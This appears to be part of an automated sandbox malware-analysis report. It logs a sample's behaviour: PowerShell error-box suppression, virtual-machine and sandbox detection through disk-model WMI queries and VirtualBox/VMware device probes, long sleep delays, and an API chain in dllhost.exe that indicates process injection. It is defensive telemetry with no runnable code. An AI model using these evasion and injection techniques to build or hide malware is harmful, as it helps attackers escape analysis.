Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dllhost.exe

Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,

37_2_0000000140001868

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxMiniRdrDN

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3632	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6097	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4682
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 752
Source: C:\Windows\System32\cmd.exe	Window / User API: threadDelayed 428	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 431	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1669
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2351	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 393	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3871	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2628	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Window / User API: threadDelayed 387
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 5192
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 636
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 3671
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 8806
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 562
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 634
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 8784
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 356
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 596
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 590
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 554
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 651
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 623
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 617
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 592
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 397
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 426
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 520
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 544
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 516
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 500
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 503
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 388
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 379

Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_37-15454
Source: C:\Windows\System32\lsass.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_33-245
Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_37-17240
Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess	graph_37-15463

Source: C:\Windows\System32\dllhost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_37-15550

Source: C:\Windows\System32\cmd.exe	API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exe	API coverage: 9.0 %
Source: C:\Windows\System32\lsass.exe	API coverage: 4.9 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404	Thread sleep count: 3632 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404	Thread sleep count: 6097 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856	Thread sleep count: 4682 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 752 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 5112	Thread sleep time: -42800s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2868	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1272	Thread sleep count: 3871 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1272	Thread sleep count: 2628 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 1860	Thread sleep count: 387 > 30
Source: C:\Windows\System32\dllhost.exe TID: 1860	Thread sleep time: -38700s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 1848	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 2384	Thread sleep count: 5192 > 30
Source: C:\Windows\System32\winlogon.exe TID: 2384	Thread sleep time: -5192000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 2380	Thread sleep count: 636 > 30
Source: C:\Windows\System32\winlogon.exe TID: 2380	Thread sleep time: -63600s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 2384	Thread sleep count: 3671 > 30
Source: C:\Windows\System32\winlogon.exe TID: 2384	Thread sleep time: -3671000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 2044	Thread sleep count: 8806 > 30
Source: C:\Windows\System32\lsass.exe TID: 2044	Thread sleep time: -8806000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 1988	Thread sleep count: 562 > 30
Source: C:\Windows\System32\lsass.exe TID: 1988	Thread sleep time: -56200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1532	Thread sleep count: 81 > 30
Source: C:\Windows\System32\svchost.exe TID: 1532	Thread sleep time: -81000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3920	Thread sleep count: 634 > 30
Source: C:\Windows\System32\svchost.exe TID: 3920	Thread sleep time: -63400s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 2060	Thread sleep count: 8784 > 30
Source: C:\Windows\System32\dwm.exe TID: 2060	Thread sleep time: -8784000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 2168	Thread sleep count: 356 > 30
Source: C:\Windows\System32\dwm.exe TID: 2168	Thread sleep time: -35600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4268	Thread sleep count: 60 > 30
Source: C:\Windows\System32\svchost.exe TID: 4268	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3380	Thread sleep count: 596 > 30
Source: C:\Windows\System32\svchost.exe TID: 3380	Thread sleep time: -59600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2092	Thread sleep count: 61 > 30
Source: C:\Windows\System32\svchost.exe TID: 2092	Thread sleep time: -61000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2236	Thread sleep count: 590 > 30
Source: C:\Windows\System32\svchost.exe TID: 2236	Thread sleep time: -59000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6536	Thread sleep count: 554 > 30
Source: C:\Windows\System32\svchost.exe TID: 6536	Thread sleep time: -55400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2500	Thread sleep count: 651 > 30
Source: C:\Windows\System32\svchost.exe TID: 2500	Thread sleep time: -65100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2508	Thread sleep count: 623 > 30
Source: C:\Windows\System32\svchost.exe TID: 2508	Thread sleep time: -62300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2840	Thread sleep count: 617 > 30
Source: C:\Windows\System32\svchost.exe TID: 2840	Thread sleep time: -61700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2992	Thread sleep count: 592 > 30
Source: C:\Windows\System32\svchost.exe TID: 2992	Thread sleep time: -59200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5096	Thread sleep count: 397 > 30
Source: C:\Windows\System32\svchost.exe TID: 5096	Thread sleep time: -39700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7128	Thread sleep count: 426 > 30
Source: C:\Windows\System32\svchost.exe TID: 7128	Thread sleep time: -42600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 432	Thread sleep count: 520 > 30
Source: C:\Windows\System32\svchost.exe TID: 432	Thread sleep time: -52000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5812	Thread sleep count: 544 > 30
Source: C:\Windows\System32\svchost.exe TID: 5812	Thread sleep time: -54400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5404	Thread sleep count: 516 > 30
Source: C:\Windows\System32\svchost.exe TID: 5404	Thread sleep time: -51600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6844	Thread sleep count: 500 > 30
Source: C:\Windows\System32\svchost.exe TID: 6844	Thread sleep time: -50000s >= -30000s
